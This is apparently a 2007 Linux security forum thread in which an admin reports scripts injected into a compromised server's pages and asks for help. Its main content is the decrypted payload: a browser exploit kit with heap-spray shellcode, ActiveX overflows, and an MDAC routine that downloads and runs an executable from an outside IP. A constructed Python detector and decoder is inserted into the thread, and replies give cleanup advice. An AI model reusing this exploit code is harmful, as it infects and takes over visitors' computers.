LinuxQuestions.org > Linux - Security > Dynamic javascript injection - Malware (https://www.linuxquestions.org/questions/linux-security-4/dynamic-javascript-injection-malware-574672/)

kentsbest 08-04-2007 05:39 AM

Dynamic javascript injection - Malware
 
Hi All,

Architecture overview:

Red Hat Enterprise Linux v3 Update 9 server running behind a Foundry load balancer. The server has been updated with the latest patches from Red Hat. Apache version is 2.0.46. We are also running ColdFusion MX 7 on the server and using PHP to serve dynamic content.

Problem description:

Earlier this week, our users started reporting that they were getting ActiveX prompts for Microsoft Data Access Components installation. In addition, some of them were getting hit by the RTSP bug (QuickTime) and some were getting JS/Exploit-BO.gen alerts via McAfee. Upon troubleshooting, we see that irrespective of the page type (simple HTML, PHP, CFM, etc.), at times a script tag similar to the one below is inserted right after the <body> tag.

<script language='JavaScript' type='text/javascript' src='shfuy.js'></script>

The javascript file name changes and the problem only occurs at times. There is no set pattern to reproduce the problem although I have noticed that if I connect to the server via a new IP address from my DSL connection, I get the javascript in the source.

I ran some sniffer traces on the server and my laptop. This showed that the javascript was being sent by the server. I was able to capture the javascript (contents of the javascript below). If anybody wants to see the sniffer traces, please let me know and I can provide download links.

We also saw a post at Bloodhound virus - Web Hosting Forum - Web hosting discussion at SiteGround.com which shows a similar problem. Unfortunately the solution (use a grsecurity kernel) does not make any sense to me and I suspect that it would be a temporary solution.

Solutions tried:
I have checked for the filenames but they do not exist on the server.

1) Have run chkrootkit and rootkit hunter - All clean
2) Have run clamav - All clean
3) Have run f-prot - All clean
4) Manually compiled Apache 2.0.59 + PHP 5.2.3 - Problem persists.

I would appreciate it if anybody could provide some input on what we might be dealing with and how to resolve the problem.

Javascript code:
var arg="akmukvfd";
var MU = "http://" + window.location.hostname + "/" + arg;
var MH = '';
for (i=0; i < MU.length; i++)
{
var b = MU.charCodeAt (i);
MH = MH + b.toString (16);
}
MH = MH.toUpperCase();
if (Math.round(MU.length/2) != (MU.length/2))
{
MH += '00';
}

var MR = '';
for (i=0; i < MH.length; i += 4)
{
MR = MR + '%u' + MH.substring(i+2, i+4) + MH.substring(i, i+2);
}

var MU2 = "\"" + MU + "\"";
var MR2 = "\"" + MR + "\"";


document.write (SB);


Cheers for any help offered

Paul
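Two triage helpers for the symptom described in this post, added here as an example and not part of the original thread: a check that flags a <script src=...> inserted directly after <body> in a captured response, and a decoder that reverses the %u-encoding the dropped .js file applies to its download URL (the MU -> MH -> MR loop above). The function names, the sample response and the allowlist are constructed for this example.

```python
"""Triage helpers for an injected <script> tag after <body> and for the
%u-encoded URL produced by the MU -> MH -> MR loop in the captured script.

All names here (find_injected_script, decode_u_encoded_bytes, ...) and the
sample response are constructed for this example; they are not from the post.
"""
import re

# Constructed sample: a normal page with the injection pattern from the post.
SAMPLE_RESPONSE = """<html><head><title>Home</title></head>
<body>
<script language='JavaScript' type='text/javascript' src='shfuy.js'></script>
<p>Welcome</p>
</body></html>"""

# A script tag that is the very first thing after <body>, loading an external src.
INJECTED_RE = re.compile(
    r"<body\b[^>]*>\s*<script\b[^>]*\bsrc\s*=\s*['\"]([^'\"]+)['\"]",
    re.IGNORECASE,
)


def find_injected_script(html):
    """Return the src of a script tag that directly follows <body>, else None."""
    m = INJECTED_RE.search(html)
    return m.group(1) if m else None


def is_suspicious_src(src, allowlist=()):
    """Flag a bare, short, all-lowercase .js name that is not on the site's allowlist."""
    if src in allowlist:
        return False
    return re.fullmatch(r"[a-z]{4,10}\.js", src) is not None


def scan_response(html, allowlist=()):
    """One verdict per captured response: (injected src or None, suspicious flag)."""
    src = find_injected_script(html)
    return src, bool(src) and is_suspicious_src(src, allowlist)


def encode_like_sample(text):
    """Mirror of the post's MU -> MH -> MR loop, used only to build test vectors.

    Hex-encode each character, pad to a multiple of 4 hex digits with '00', then
    emit %uXXXX units with the two bytes swapped (little-endian UTF-16 code units).
    """
    mh = "".join(format(ord(c), "02x") for c in text).upper()
    if len(mh) % 4:
        mh += "00"
    return "".join("%u" + mh[i + 2:i + 4] + mh[i:i + 2] for i in range(0, len(mh), 4))


def js_unescape(s):
    """Reverse JavaScript unescape(): %uXXXX -> one code unit, %XX -> one byte."""
    out, i = [], 0
    while i < len(s):
        if s.startswith("%u", i) and len(s) >= i + 6:
            out.append(chr(int(s[i + 2:i + 6], 16)))
            i += 6
        elif s[i] == "%" and len(s) >= i + 3:
            out.append(chr(int(s[i + 1:i + 3], 16)))
            i += 3
        else:
            out.append(s[i])
            i += 1
    return "".join(out)


def decode_u_encoded_bytes(mr):
    """Undo the byte swap: each %uXXXX unit carries two ASCII bytes, low byte first.

    Trailing NUL padding added for odd-length input is stripped.
    """
    chars = []
    for unit in js_unescape(mr):
        code = ord(unit)
        chars.append(chr(code & 0xFF))
        chars.append(chr(code >> 8))
    return "".join(chars).rstrip("\x00")


if __name__ == "__main__":
    print(scan_response(SAMPLE_RESPONSE))
    # Constructed URL; the real sample builds it from window.location.hostname + "/" + arg.
    mr = encode_like_sample("http://www.example.test/akmukvfd")
    print(mr, "->", decode_u_encoded_bytes(mr))
```

Run scan_response over saved responses from each back-end behind the load balancer to see which node serves the injected tag; js_unescape also decodes the %XX blob that the sample passes to document.write.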

kentsbest 08-04-2007 05:39 AM

If it's any help, the basic encrypted parts, when decrypted, are:

<html>
<body>
<div id="mydiv"></div>

<script language="JavaScript">

var memory = new Array();
var mem_flag = 0;

function having() { memory=memory; setTimeout("having()", 2000); }

function getSpraySlide(spraySlide, spraySlideSize)
{
while (spraySlide.length*2<spraySlideSize)
{spraySlide += spraySlide;}

spraySlide = spraySlide.substring(0,spraySlideSize/2);
return spraySlide;
}

function makeSlide()
{
var heapSprayToAddress = 0x0c0c0c0c;
var payLoadCode = unescape("%u4343%u4343%u0feb%u335b%u66c9%u80b9%u80 01%uef33" +
"%ue243%uebfa%ue805%uffec%uffff%u8b7f%udf4e%uefef% u64ef%ue3af%u9f64%u42f3%u9f64%u6ee7%uef03%uefeb" +
"%u64ef%ub903%u6187%ue1a1%u0703%uef11%uefef%uaa66% ub9eb%u7787%u6511%u07e1%uef1f%uefef%uaa66%ub9e7" +
"%uca87%u105f%u072d%uef0d%uefef%uaa66%ub9e3%u0087% u0f21%u078f%uef3b%uefef%uaa66%ub9ff%u2e87%u0a96" +
"%u0757%uef29%uefef%uaa66%uaffb%ud76f%u9a2c%u6615% uf7aa%ue806%uefee%ub1ef%u9a66%u64cb%uebaa%uee85" +
"%u64b6%uf7ba%u07b9%uef64%uefef%u87bf%uf5d9%u9fc0% u7807%uefef%u66ef%uf3aa%u2a64%u2f6c%u66bf%ucfaa" +
"%u1087%uefef%ubfef%uaa64%u85fb%ub6ed%uba64%u07f7% uef8e%uefef%uaaec%u28cf%ub3ef%uc191%u288a%uebaf" +
"%u8a97%uefef%u9a10%u64cf%ue3aa%uee85%u64b6%uf7ba% uaf07%uefef%u85ef%ub7e8%uaaec%udccb%ubc34%u10bc" +
"%ucf9a%ubcbf%uaa64%u85f3%ub6ea%uba64%u07f7%uefcc% uefef%uef85%u9a10%u64cf%ue7aa%ued85%u64b6%uf7ba" +
"%uff07%uefef%u85ef%u6410%uffaa%uee85%u64b6%uf7ba% uef07%uefef%uaeef%ubdb4%u0eec%u0eec%u0eec%u0eec" +
"%u036c%ub5eb%u64bc%u0d35%ubd18%u0f10%u64ba%u6403% ue792%ub264%ub9e3%u9c64%u64d3%uf19b%uec97%ub91c" +
"%u9964%ueccf%udc1c%ua626%u42ae%u2cec%udcb9%ue019% uff51%u1dd5%ue79b%u212e%uece2%uaf1d%u1e04%u11d4" +
"%u9ab1%ub50a%u0464%ub564%ueccb%u8932%ue364%u64a4% uf3b5%u32ec%ueb64%uec64%ub12a%u2db2%uefe7%u1b07" +
"%u1011%uba10%ua3bd%ua0a2%uefa1" +
OUTPUT MR2 HERE
);
var heapBlockSize = 0x400000;
var payLoadSize = payLoadCode.length * 2;
var spraySlideSize = heapBlockSize - (payLoadSize+0x3;
var spraySlide = unescape("%u0c0c%u0c0c");

spraySlide = getSpraySlide(spraySlide,spraySlideSize);
heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize;

for (i=0;i<heapBlocks;i++)
{
memory[i] = spraySlide + payLoadCode;
}

mem_flag = 1;
having();
return memory;
}

function startWVF()
{
for (i=0;i<128;i++)
{
try{
var tar = new ActiveXObject('WebViewFolderIcon.WebViewFolderIcon .1');
tar.setSlice(0x7ffffffe, 0x0c0c0c0c, 0x0c0c0c0c,0x0c0c0c0c );
}catch(e){}
}
}

function startWinZip(object)
{
var xh = 'A';
while (xh.length < 231) xh+='A';
xh+="\x0c\x0c\x0c\x0c\x0c\x0c\x0c";
object.CreateNewFolderFromName(xh);
}

function startOverflow(num)
{
if (num == 0) {
try {
var qt = new ActiveXObject('QuickTime.QuickTime');
if (qt) {
var qthtml = '<object CLASSID="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" width="1" height="1" style="border:0px">'+
'<param name="src" value="http://66.96.218.85/download/167212/movie.qtl">'+
'<param name="autoplay" value="true">'+
'<param name="loop" value="false">'+
'<param name="controller" value="true">'+
'</object>';
if (! mem_flag) makeSlide();
document.getElementById('mydiv').innerHTML = qthtml;
num = 255;
}
} catch(e) { }

if (num = 255) setTimeout("startOverflow(1)", 2000);
else startOverflow(1);

} else if (num == 1) {
try {
var winzip = document.createElement("object");
winzip.setAttribute("classid", "clsid:A09AE68F-B14D-43ED-B713-BA413F034904");

var ret=winzip.CreateNewFolderFromName(unescape("%00") );
if (ret == false) {
if (! mem_flag) makeSlide();
startWinZip(winzip);
num = 255;
}

} catch(e) { }

if (num = 255) setTimeout("startOverflow(2)", 2000);
else startOverflow(2);

} else if (num == 2) {

try {
var tar = new ActiveXObject('WebViewFolderIcon.WebViewFolderIcon .1');
if (tar) {
if (! mem_flag) makeSlide();
startWVF();
}
} catch(e) { }
}
}


function GetRandString(len)
{
var chars = "abcdefghiklmnopqrstuvwxyz";
var string_length = len;
var randomstring = '';
for (var i=0; i<string_length; i++) {
var rnum = Math.floor(Math.random() * chars.length);
randomstring += chars.substring(rnum,rnum+1);
}

return randomstring;
}

function CreateObject(CLSID, name) {
var r = null;
try { eval('r = CLSID.CreateObject(name)') }catch(e){}
if (! r) { try { eval('r = CLSID.CreateObject(name, "")') }catch(e){} }
if (! r) { try { eval('r = CLSID.CreateObject(name, "", "")') }catch(e){} }
if (! r) { try { eval('r = CLSID.GetObject("", name)') }catch(e){} }
if (! r) { try { eval('r = CLSID.GetObject(name, "")') }catch(e){} }
if (! r) { try { eval('r = CLSID.GetObject(name)') }catch(e){} }
return(r);
}

function XMLHttpDownload(xml, url) {

try {
xml.open("GET", url, false);
xml.send(null);

} catch(e) { return 0; }

return xml.responseBody;
}

function ADOBDStreamSave(o, name, data) {

try {
o.Type = 1;
o.Mode = 3;
o.Open();
o.Write(data);
o.SaveToFile(name, 2);
o.Close();
} catch(e) { return 0; }

return 1;
}

function ShellExecute(exec, name, type) {

if (type == 0) {
try { exec.Run(name, 0); return 1; } catch(e) { }
} else {
try { exe.ShellExecute(name); return 1; } catch(e) { }
}

return(0);

}

function MDAC() {
var t = new Array('{BD96C556-65A3-11D0-983A-00C04FC29E30}', '{BD96C556-65A3-11D0-983A-00C04FC29E36}', '{AB9BCEDD-EC7E-47E1-9322-D4A210617116}', '{0006F033-0000-0000-C000-000000000046}', '{0006F03A-0000-0000-C000-000000000046}', '{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}', '{6414512B-B978-451D-A0D8-FCFDF33E833C}', '{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}', '{06723E09-F4C2-43c8-8358-09FCD1DB0766}', '{639F725F-1B2D-4831-A9FD-874847682010}', '{BA018599-1DB3-44f9-83B4-461454C84BF8}', '{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}', '{E8CCCDDF-CA28-496b-B050-6C07C962476B}', null);
var v = new Array(null, null, null);
var i = 0;
var n = 0;
var ret = 0;
var urlRealExe =
OUTPUT MU2 HERE
;

while (t[i] && (! v[0] || ! v[1] || ! v[2]) ) {
var a = null;

try {
a = document.createElement("object");
a.setAttribute("classid", "clsid:" + t[i].substring(1, t[i].length - 1));
} catch(e) { a = null; }

if (a) {
if (! v[0]) {
v[0] = CreateObject(a, "msxml2.XMLHTTP");
if (! v[0]) v[0] = CreateObject(a, "Microsoft.XMLHTTP");
if (! v[0]) v[0] = CreateObject(a, "MSXML2.ServerXMLHTTP");
}

if (! v[1]) {
v[1] = CreateObject(a, "ADODB.Stream");
}

if (! v[2]) {
v[2] = CreateObject(a, "WScript.Shell");
if (! v[2]) {
v[2] = CreateObject(a, "Shell.Application");
if (v[2]) n=1;
}
}
}

i++;
}

if (v[0] && v[1] && v[2]) {
var data = XMLHttpDownload(v[0], urlRealExe);
if (data != 0) {
var name = "c:\\sys"+GetRandString(4)+".exe";
if (ADOBDStreamSave(v[1], name, data) == 1) {
if (ShellExecute(v[2], name, n) == 1) {
ret=1;
}
}
}
}

return ret;
}

function start() {

if (! MDAC() ) { startOverflow(0); }

}

start ();

</script>
</body>
</html>

jiml8 08-04-2007 07:15 PM

Seems pretty clear that the server has been cracked. I wonder...did you check the signatures on all the security updates to the server? Someone got you.

Do you have hard passwords set on SSH and ftp? Do you have root login disabled? Who has physical access to the server?

If you are unable to find the particular code that is compromised, your best solution is to start over with a clean install of the OS. Actually, this is your best solution anyway. After doing the clean install, install and configure tripwire to keep track of changes.

Crito 08-04-2007 10:33 PM

Quote:

Originally Posted by kentsbest
Unfortunately the solution (use grsecurity kernel) does not makes any sense and I suspect that it would be a temp solution.

Sounds like the right solution to me, and a permanent one too. Though if you're going to rebuild using a newer version of RHEL might as well use SELinux instead.

blackraider 08-04-2007 10:53 PM

Maybe it could help to know the name of the virus: JS:IESlice.

It is detected under this name by Avast Antivirus. It seems to be new in the city (first sightings reported on July 15 or so) and there are only a few references on the web about this trojan downloader.
